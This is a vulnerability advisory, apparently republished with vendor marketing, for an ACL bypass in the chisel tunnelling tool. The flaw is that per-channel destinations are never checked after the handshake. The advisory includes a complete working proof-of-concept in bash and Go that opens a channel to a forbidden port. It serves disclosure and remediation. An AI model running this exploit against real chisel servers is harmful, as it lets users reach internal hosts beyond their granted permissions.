Summary
Chisel has an ACL Bypass via Post-Handshake SSH Channel ExtraData Injection
Authenticated chisel clients can bypass --authfile ACL restrictions and tunnel traffic to arbitrary destinations reachable from the server. The ACL is enforced only during the initial handshake against declared remotes, but never on subsequent SSH channels that carry actual traffic. A malicious client authenticates with a permitted remote, then opens channels to any host:port it wants.
Details
The chisel server validates user ACLs in two places but is missing validation in one of the important places.
The server/server_handler.go checks the ACL, during the initial config handshake:
for _, r := range c.Remotes {
if user != nil {
addr := r.UserAddr()
if !user.HasAccess(addr) {
failed(s.Errorf("access to '%s' denied", addr))
return
}
}
}
r.Reply(true, nil)
This validates the declared remote list from the client's config request. It runs once, at connection setup. But in share/tunnel/tunnel_out_ssh.go ACL aren't being checked, when the server processes actual traffic channels:
func (t *Tunnel) handleSSHChannel(ch ssh.NewChannel) {
remote := string(ch.ExtraData()) // client-controlled
hostPort, proto := settings.L4Proto(remote)
sshChan, reqs, err := ch.Accept() // accepted unconditionally
// ...
err = t.handleTCP(l, stream, hostPort) // dials whatever client said
}
func (t *Tunnel) handleTCP(l *cio.Logger, src io.ReadWriteCloser, hostPort string) error {
dst, err := net.Dial("tcp", hostPort) // no ACL check
// ...
}
The tunnel.Config struct has no User field, no allowed-address list, and no ACL callback. The user context from server_handler.go is never propagated to the tunnel layer:
type Config struct {
*cio.Logger
Inbound bool
Outbound bool
Socks bool
KeepAlive time.Duration
// ------- No User, no AllowedRemotes, no ACL
}
Since ch.ExtraData() is fully controlled by the SSH client, any authenticated user can open channels to arbitrary destinations after passing the handshake with a permitted remote.
PoC
Directory structure format:
poc
├── poc.sh
└── probe
├── go.mod
├── go.sum
└── main.go
poc.sh
#!/usr/bin/env bash
# Requires: Go, nc (netcat)
set -euo pipefail
DIR="$(cd "$(dirname "$0")" && pwd)"
REPO="$DIR/.."
freeport() { python3 -c "import socket;s=socket.socket();s.bind(('',0));print(s.getsockname()[1]);s.close()"; }
cleanup() { kill $SERVER $LISTENER 2>/dev/null; rm -f "$AUTH"; }
trap cleanup EXIT
# Build
echo "[*] Building..."
(cd "$REPO" && go build -o /tmp/_chisel .)
(cd "$DIR/probe" && go build -o /tmp/_probe .)
# Ports
SP=$(freeport); AP=$(freeport); BP=$(freeport)
echo "[*] Server :$SP Allowed :$AP Blocked :$BP"
# Authfile, user:pass may only reach 127.0.0.1:$AP
AUTH=$(mktemp)
printf '{"user:pass":["^127\\\\.0\\\\.0\\\\.1:%s$"]}\n' "$AP" > "$AUTH"
# Start forbidden-target listener and chisel server
(echo "FORBIDDEN_TARGET_REACHED" | nc -l 127.0.0.1 "$BP") & LISTENER=$!
/tmp/_chisel server --port "$SP" --authfile "$AUTH" --key seed 2>/dev/null & SERVER=$!
sleep 1
# Exploit
CHISEL_SERVER="127.0.0.1:$SP" ALLOWED_PORT="$AP" BLOCKED_PORT="$BP" /tmp/_probe
main.go
// Chisel ACL bypass probe. Authenticates with an allowed remote,
// then opens an SSH channel to a forbidden destination via ExtraData.
package main
import (
"encoding/json"
"fmt"
"net"
"net/http"
"os"
"time"
"github.com/gorilla/websocket"
"github.com/jpillora/chisel/share/cnet"
"github.com/jpillora/chisel/share/settings"
"golang.org/x/crypto/ssh"
)
func main() {
server := os.Getenv("CHISEL_SERVER")
allowed := os.Getenv("ALLOWED_PORT")
blocked := os.Getenv("BLOCKED_PORT")
// WebSocket → net.Conn
ws, _, err := (&websocket.Dialer{
HandshakeTimeout: 5 * time.Second,
Subprotocols: []string{"chisel-v3"},
}).Dial("ws://"+server, http.Header{})
check(err, "ws dial")
conn := cnet.NewWebSocketConn(ws)
// SSH handshake
sc, chans, reqs, err := ssh.NewClientConn(conn, "", &ssh.ClientConfig{
User: "user",
Auth: []ssh.AuthMethod{ssh.Password("pass")},
HostKeyCallback: ssh.InsecureIgnoreHostKey(),
})
check(err, "ssh")
go ssh.DiscardRequests(reqs)
go func() { for c := range chans { c.Reject(ssh.Prohibited, "") } }()
// Send config with only the allowed remote
r, _ := settings.DecodeRemote(fmt.Sprintf("0.0.0.0:%s:127.0.0.1:%s", allowed, allowed))
cfg, _ := json.Marshal(settings.Config{Version: "0", Remotes: []*settings.Remote{r}})
ok, reply, err := sc.SendRequest("config", true, cfg)
check(err, "config")
if !ok {
die("config rejected: %s", reply)
}
fmt.Printf("[+] Config accepted (only 127.0.0.1:%s allowed)\n", allowed)
// Open channel to BLOCKED destination
target := net.JoinHostPort("127.0.0.1", blocked)
ch, cr, err := sc.OpenChannel("chisel", []byte(target))
if err != nil {
fmt.Printf("[-] REJECTED, server refused %s\n", target)
os.Exit(1)
}
go ssh.DiscardRequests(cr)
fmt.Printf("[!] ACCEPTED, channel opened to %s\n", target)
// Read response from forbidden target
buf := make([]byte, 256)
done := make(chan int, 1)
go func() { n, _ := ch.Read(buf); done <- n }()
select {
case n := <-done:
if n > 0 {
fmt.Printf("[!] Data: %s\n", buf[:n])
}
case <-time.After(3 * time.Second):
}
fmt.Println("CONFIRMED, ACL bypass: server dialed unauthorized destination")
ch.Close()
sc.Close()
}
func check(err error, ctx string) {
if err != nil {
die("%s: %v", ctx, err)
}
}
func die(f string, a ...interface{}) {
fmt.Fprintf(os.Stderr, f+"\n", a...)
os.Exit(1)
}
Impact
- Complete ACL bypass: The
--authfileaddress restrictions are enforceable only on paper - Authenticated users can reach any host/port the server process can dial
The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions. Typical impact: unauthorized data access or execution of privileged operations.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Already deployed Kodem?
See it in your environmentNew to Kodem? Get a demo →Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-48113? CVE-2026-48113 is a high-severity incorrect authorization vulnerability in github.com/jpillora/chisel (go), affecting versions <= 1.11.4. It is fixed in 1.11.5. The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions.
- Which versions of github.com/jpillora/chisel are affected by CVE-2026-48113? github.com/jpillora/chisel (go) versions <= 1.11.4 is affected.
- Is there a fix for CVE-2026-48113? Yes. CVE-2026-48113 is fixed in 1.11.5. Upgrade to this version or later.
- Is CVE-2026-48113 exploitable, and should I be worried? Whether CVE-2026-48113 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-48113 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-48113? Upgrade
github.com/jpillora/chiselto 1.11.5 or later.